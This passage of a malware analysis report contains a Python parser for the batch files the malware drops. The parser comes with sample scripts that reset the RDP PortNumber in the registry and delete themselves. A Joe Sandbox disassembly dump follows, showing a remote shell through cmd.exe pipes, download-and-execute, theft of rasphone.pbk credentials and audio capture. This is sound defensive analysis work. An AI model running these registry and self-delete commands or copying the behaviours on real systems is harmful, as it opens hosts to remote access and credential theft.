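            in_quotes, started = not in_quotes, True
        elif ch.isspace() and not in_quotes:
            if started:
                args.append("".join(cur))
                cur, started = [], False
        else:
            cur.append(ch)
            started = True
    if started:
        args.append("".join(cur))
    return args


def parse_reg_add(argv: list):
    """Decode 'REG ADD <key> /v <name> /t <type> /d <data> /f'; None otherwise."""
    if len(argv) < 3 or [a.upper() for a in argv[:2]] != ["REG", "ADD"]:
        return None
    op = {"key": argv[2], "value": "", "type": "REG_SZ", "data": "", "force": False}
    names = {"/v": "value", "/t": "type", "/d": "data"}
    i = 3
    while i < len(argv):
        flag = argv[i].lower()
        if flag == "/f":
            op["force"] = True
        elif flag in names and i + 1 < len(argv):
            op[names[flag]] = argv[i + 1]
            i += 1
        i += 1
    return op


def parse_batch(text: str) -> dict:
    """Summarise a dropped .bat: files deleted, REG ADD operations, 'del %0'."""
    out = {"deleted": [], "reg_adds": [], "self_delete": False}
    for raw in text.splitlines():
        line = raw.strip().lstrip("@")        # a leading '@' only suppresses echo
        if not line:
            continue
        argv = argv_split(line)
        if argv[0].lower() == "del":
            for target in argv[1:]:
                if target == "%0":
                    out["self_delete"] = True   # the script removes itself
                else:
                    out["deleted"].append(target)
        elif argv[0].lower() == "reg":
            op = parse_reg_add(argv)
            if op:
                out["reg_adds"].append(op)
    return out


def reg_dword(data: str) -> int:
    """reg.exe accepts decimal or 0x-prefixed hex for REG_DWORD data."""
    return int(data, 16) if data.lower().startswith("0x") else int(data, 10)


def rdp_port_changes(summary: dict) -> list:
    """PortNumber values written under Terminal Server (both keys from the report)."""
    return [reg_dword(op["data"]) for op in summary["reg_adds"]
            if op["value"].lower() == "portnumber"
            and "terminal server" in op["key"].lower()]


# Constructed samples: the literal fragments are the report's, the rest is assumed.
SELF_DELETE_BAT = ("@echo off\r\n"
                   "@del 3596799a1543bc9f.aqq\r\n"
                   '@del "C:\\path with space\\sample.exe"\r\n'
                   "@del afc9fe2f418b00a0.bat\r\n"
                   "@exit\r\n")
RDP_BAT = ('REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server'
           '\\Wds\\rdpwd\\Tds\\tcp /v PortNumber /t REG_DWORD /d 13389 /f \r\n'
           'REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal" "Server'
           '\\WinStations\\RDP-Tcp /v PortNumber /t REG_DWORD /d 13389 /f \r\n'
           'del %0\r\n')

if __name__ == "__main__":
    print(parse_batch(SELF_DELETE_BAT))
    print(rdp_port_changes(parse_batch(RDP_BAT)))
```

Because the "/d" value is whatever atoi returned, the intended outcome is an RDP listener on an operator-chosen port; on a live host the matching check is to read both PortNumber values the script touches and compare them with 3389, and to look for C:\3389.bat even though the script deletes itself, since the write and the delete are separate events.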
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D68F
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 1000D6A3
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 1000D6AF
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 1000D6BB
                                • GetProcAddress.KERNEL32(00000000,getsockname), ref: 1000D6C7
                                • GetProcAddress.KERNEL32(00000000,select), ref: 1000D6D3
                                • GetLastError.KERNEL32(00000000), ref: 1000D6F0
                                • GetLastError.KERNEL32(00000000), ref: 1000D740
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$ErrorLast$LibraryLoad
                                • String ID: connect$getsockname$recv$select$socket$ws2_32.dll
                                • API String ID: 1969025732-1466708075
                                • Opcode ID: 4869f2540624f0de57036062d3a6f7b94b0a05a06f79d3c308fa5c7f5636398a
                                • Instruction ID: 9eea021e2679a54889db195b2b8dea17cea3e2387c884d07e69dbabe29e95218
                                • Opcode Fuzzy Hash: 4869f2540624f0de57036062d3a6f7b94b0a05a06f79d3c308fa5c7f5636398a
                                • Instruction Fuzzy Hash: EB716E716083419BE310DF64C884A5FBBE5FFC8354F108A2EF58987290E775D845CB66
                                APIs
                                • LoadLibraryA.KERNEL32(wininet.dll), ref: 100047A3
                                • GetProcAddress.KERNEL32(00000000,InternetOpenA), ref: 100047C1
                                • GetProcAddress.KERNEL32(00000000,InternetConnectA), ref: 100047CB
                                • GetProcAddress.KERNEL32(00000000,HttpOpenRequestA), ref: 100047D7
                                • GetProcAddress.KERNEL32(00000000,HttpSendRequestA), ref: 100047E3
                                • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 100047EF
                                • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 100047FB
                                • printf.MSVCRT ref: 100048EB
                                • FreeLibrary.KERNEL32(00000000), ref: 1000491A
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Library$FreeLoadprintf
                                • String ID: HTTP/1.1$Hackeroo$HttpOpenRequestA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetOpenA$InternetReadFile$wininet.dll
                                • API String ID: 2425834421-3882969375
                                • Opcode ID: ab2da8832e121b78344de6fdb46b171ab1ca8c0203973e7725e5a9d28d361bfa
                                • Instruction ID: 681ed2cf8dfbe48c2289dcdc3772bf4013358cff2fe0b36028245d622f2c89cd
                                • Opcode Fuzzy Hash: ab2da8832e121b78344de6fdb46b171ab1ca8c0203973e7725e5a9d28d361bfa
                                • Instruction Fuzzy Hash: 1E41D271504344ABE220DF658C44FAFBBE8EBC5B50F40491DF68567180DBB8E9048B9A
                                APIs
                                • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011277
                                • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 10011281
                                • TerminateProcess.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011289
                                • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 10011295
                                • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 10011299
                                • WaitForSingleObject.KERNEL32(?,000007D0,?,?,?,10009D95,?), ref: 100112A4
                                • TerminateThread.KERNEL32(?,00000000,?,?,?,10009D95,?), ref: 100112B0
                                • Sleep.KERNEL32(00000001,?,?,?,10009D95,?), ref: 100112B4
                                • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112C4
                                • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112CE
                                • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112D8
                                • DisconnectNamedPipe.KERNEL32(?,?,?,?,10009D95,?), ref: 100112E2
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112EE
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112F4
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 100112FA
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011300
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011306
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 1001130C
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011312
                                • CloseHandle.KERNEL32(?,?,?,?,10009D95,?), ref: 10011318
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$DisconnectNamedPipeTerminate$SleepThread$ObjectProcessSingleWait
                                • String ID:
                                • API String ID: 3528565692-0
                                • Opcode ID: e2462b9e51b2cd782e0542687645bfdbb219e5ad88ab8734fd4dc33a84b79df5
                                • Instruction ID: 9c54264b77c618bb7f3ff833bc2f4ed521a7b34ae7468bb6bf74d3fa9e72dd85
                                • Opcode Fuzzy Hash: e2462b9e51b2cd782e0542687645bfdbb219e5ad88ab8734fd4dc33a84b79df5
                                • Instruction Fuzzy Hash: 3921DA71600744ABD624EBBACC84F5BF3EDAF98750F014A0DF246D76A0CAB4F8419E60
                                APIs
                                • strrchr.MSVCRT ref: 10008139
                                • RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 1000816D
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                 • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                 • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Openstrrchr
                                • String ID: "%1$%s\shell\open\command$D
                                • API String ID: 1564636448-1634606264
                                • Opcode ID: 2cf8cfa4d3311e3e4da36e51a929757a0acaa25937306c6d2d5e068f66906cb7
                                • Instruction ID: ab82aeec8821551b8da03e6dabbe2dd6c64f2c5119572b537ef325ac62f7637e
                                • Opcode Fuzzy Hash: 2cf8cfa4d3311e3e4da36e51a929757a0acaa25937306c6d2d5e068f66906cb7
                                • Instruction Fuzzy Hash: 13419572108345ABE714CB60DC80FABB7EDFBC4345F004C1DF69497250D675AA49C762
                                APIs
                                  • Part of subcall function 1000D1D0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,1000C45E,?,76F923A0,00000000,100026B5,?,?,00000000,?,?), ref: 1000D1EE
                                • CreatePipe.KERNEL32 ref: 1001108D
                                • CloseHandle.KERNEL32(?), ref: 100110A4
                                • CloseHandle.KERNEL32(?), ref: 100110B1
                                • CreatePipe.KERNEL32(00001F58,00001F54,00001F50,00000000), ref: 100110C4
                                • CloseHandle.KERNEL32(?), ref: 100110DB
                                • CloseHandle.KERNEL32(?), ref: 100110E8
                                • GetStartupInfoA.KERNEL32(0000000C), ref: 10011111
                                • GetSystemDirectoryA.KERNEL32 ref: 10011148
                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?), ref: 10011199
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111AD
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111B3
                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111B9
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 100111BE
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$Create$Pipe$DirectoryEventInfoProcessStartupSystem
                                • String ID: D$\cmd.exe
                                • API String ID: 1868129719-520541716
                                • Opcode ID: dd8b29a44c76f5e59cb4cd19e233df8ee08fd2a2694a344ceaa59677d3bb7f86
                                • Instruction ID: 21a73dd738c10b035e80e71e0c9392a4d89bcda19f6c107ece9e955ff4ea587f
                                • Opcode Fuzzy Hash: dd8b29a44c76f5e59cb4cd19e233df8ee08fd2a2694a344ceaa59677d3bb7f86
                                • Instruction Fuzzy Hash: 0271AF71604745AFE714CF25CC81B9BBBE5EFC8B00F104A2EF655AB290D7B4E8448B96
                                APIs
                                • sprintf.MSVCRT ref: 10006B8F
                                • sprintf.MSVCRT ref: 10006BD7
                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 10006BEF
                                • Sleep.KERNEL32(00000064,00000000,?,?,00000000,00000000), ref: 10006BF6
                                • RtlExitUserThread.NTDLL(00000000), ref: 10006C08
                                • Sleep.KERNEL32(000493E0), ref: 10006C38
                                • CreateFileA.KERNEL32(C:\Del.bat,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 10006C72
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 10006C92
                                • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 10006C99
                                • WinExec.KERNEL32(C:\Del.bat,00000000), ref: 10006CA6
                                • RtlExitUserThread.NTDLL(00000000), ref: 10006CBF
                                  • Part of subcall function 100067F0: GetInputState.USER32 ref: 100067F3
                                  • Part of subcall function 100067F0: GetCurrentThreadId.KERNEL32 ref: 100067FF
                                  • Part of subcall function 100067F0: PostThreadMessageA.USER32(00000000), ref: 10006806
                                  • Part of subcall function 100067F0: GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                  • Part of subcall function 100040D0: GetTickCount.KERNEL32 ref: 100040D1
                                  • Part of subcall function 100040D0: rand.MSVCRT ref: 100040D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$File$ExitMessageSleepUsersprintf$CloseCountCreateCurrentDownloadExecHandleInputPostStateTickWriterand
                                • String ID: %s?abc=%d%d%d%d$C:\Del.bat$C:\WINDOWS\TEMP\%d%d%d%d.ccc$Del c:\windows\temp\**.cccDel %0
                                • API String ID: 1802622305-1970547419
                                • Opcode ID: 5d690c170f66fd898cb5acb4569625737ab5efa727c2d913b09523f43e067e74
                                • Instruction ID: a99f9cc9cae1f12021b554281c88dee9c3d8dd1fd31d28a6ceb09f359c56c71a
                                • Opcode Fuzzy Hash: 5d690c170f66fd898cb5acb4569625737ab5efa727c2d913b09523f43e067e74
                                • Instruction Fuzzy Hash: EC4105B26403413EF210DBA4DC42FB7779AEB85744F110438F78AAA2C1DAB579498667
                                APIs
                                • GetWindowsDirectoryA.KERNEL32 ref: 10006F5E
                                • strchr.MSVCRT ref: 10006F70
                                • lstrcpy.KERNEL32(00000001), ref: 10006F7B
                                • lstrcat.KERNEL32(?,?), ref: 10006F90
                                • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 10006F9C
                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 10006FAC
                                • wsprintfA.USER32 ref: 10006FCC
                                • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 10006FEA
                                • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,00000400), ref: 10007015
                                • lstrlen.KERNEL32(00000000), ref: 1000702D
                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 1000704B
                                Strings
                                • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10006FB9
                                • %s//%s, xrefs: 10006FC6
                                • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10006F96
                                • Documents and Settings\, xrefs: 10006F64
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$??2@??3@DirectoryFolderNamesPathPrivateProfileSectionSpecialWindowslstrcpylstrlenstrchrwsprintf
                                • String ID: %s//%s$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                                • API String ID: 1834765725-145037316
                                • Opcode ID: 79a34f43d602c1009b597179ffdf5f7e60e5cfccbe8278ec635163b31d8a3950
                                • Instruction ID: 9755ad88c6a7c2de1a7a09f9197344cb42d28d28b3bab84a9660466105d068a3
                                • Opcode Fuzzy Hash: 79a34f43d602c1009b597179ffdf5f7e60e5cfccbe8278ec635163b31d8a3950
                                • Instruction Fuzzy Hash: 3C31A1B1504395AFE710DF60DC88F9BB7E9FB89705F04091CF68597240E679EA09CBA2
                                APIs
                                • ??2@YAPAXI@Z.MSVCRT(0000001C,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007840
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007883
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007897
                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100078DD
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100078F1
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007937
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 1000794B
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 10007991
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079A5
                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079EB
                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,10007750,?,?,00000000,?,?,00000000,?,?), ref: 100079FF
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 10007A58
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007A6C
                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 10007AB1
                                • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007AC5
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$??3@
                                • String ID:
                                • API String ID: 1245774677-0
                                • Opcode ID: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                                • Instruction ID: ecb620a65a387641466dd8f5cfd537940ff52a14495c8058afc9bdc292101b4f
                                • Opcode Fuzzy Hash: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                                • Instruction Fuzzy Hash: BCC1BCBAB042054BE718CE39C89296B77D6FB882A0B15862CFD1A873C1DF75ED05C791
                                APIs
                                  • Part of subcall function 1000D900: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,76F923A0,?,?), ref: 1000D96C
                                • lstrlen.KERNEL32(?), ref: 10009365
                                • lstrcat.KERNEL32(?,rar.exe), ref: 100093A1
                                • lstrcpy.KERNEL32(?,?), ref: 100093B2
                                • PathRemoveFileSpecA.SHLWAPI(?), ref: 100093BC
                                • lstrcpy.KERNEL32(?,?), ref: 100093C8
                                • PathRemoveExtensionA.SHLWAPI(?), ref: 100093CF
                                • lstrcat.KERNEL32(?,1007A0CC), ref: 100093DF
                                • wsprintfA.USER32 ref: 100093F4
                                • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 10009418
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: PathRemovelstrcatlstrcpy$ExecuteExtensionFileOpenShellSpeclstrlenwsprintf
                                • String ID: WinRAR\shell\open\command$open$rar.exe$x %s %s
                                • API String ID: 1763624715-2921234164
                                • Opcode ID: ad5e5701b212f8edd3ead078ccd65cb98e6fd0e360b7cda8834bb0ad263879bd
                                • Instruction ID: a81b6a790fa88baee27cdb696a84ad45282978667647cc58660b41da7713e94e
                                • Opcode Fuzzy Hash: ad5e5701b212f8edd3ead078ccd65cb98e6fd0e360b7cda8834bb0ad263879bd
                                • Instruction Fuzzy Hash: 6D3195B6104399AFE730DB64CC94FEB77AEEBC8304F00891CF68597141DA756A05CB62
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: strchrstrncpy$atoi
                                • String ID:
                                • API String ID: 3940265933-0
                                • Opcode ID: 7e5e4238010ca1327608cdc8460cd83de5e126a4c912968ad0552fe01382e086
                                • Instruction ID: 21ca36c069230d07eea7d776a96db384ee496568b4fed2c6a8f6547b2fdee8a7
                                • Opcode Fuzzy Hash: 7e5e4238010ca1327608cdc8460cd83de5e126a4c912968ad0552fe01382e086
                                • Instruction Fuzzy Hash: 6591F8329002595BD728CB75CC45AEFB7A5FF88360F10436AF91AA32D0DEB49F45CA94
                                APIs
                                • waveInStop.WINMM(?,?,?,?,?,10002D08), ref: 10002D37
                                • waveInReset.WINMM(?,?,?,?,?,10002D08), ref: 10002D41
                                • waveInUnprepareHeader.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002D5E
                                • waveInClose.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002D6A
                                • TerminateThread.KERNEL32(?,000000FF,?,00000020,?,?,?,?,10002D08), ref: 10002D76
                                • waveOutReset.WINMM(?,?,?,?,?,10002D08), ref: 10002D87
                                • waveOutUnprepareHeader.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002DA4
                                • waveOutClose.WINMM(?,?,00000020,?,?,?,?,10002D08), ref: 10002DB0
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,10002D08), ref: 10002DC2
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,10002D08), ref: 10002DCA
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,10002D08), ref: 10002DD3
                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,10002D08), ref: 10002DDC
                                • CloseHandle.KERNEL32(?), ref: 10002DF4
                                • CloseHandle.KERNEL32(?), ref: 10002DFA
                                • CloseHandle.KERNEL32(?), ref: 10002E00
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Close$??3@$Handle$HeaderResetUnprepare$StopTerminateThread
                                • String ID:
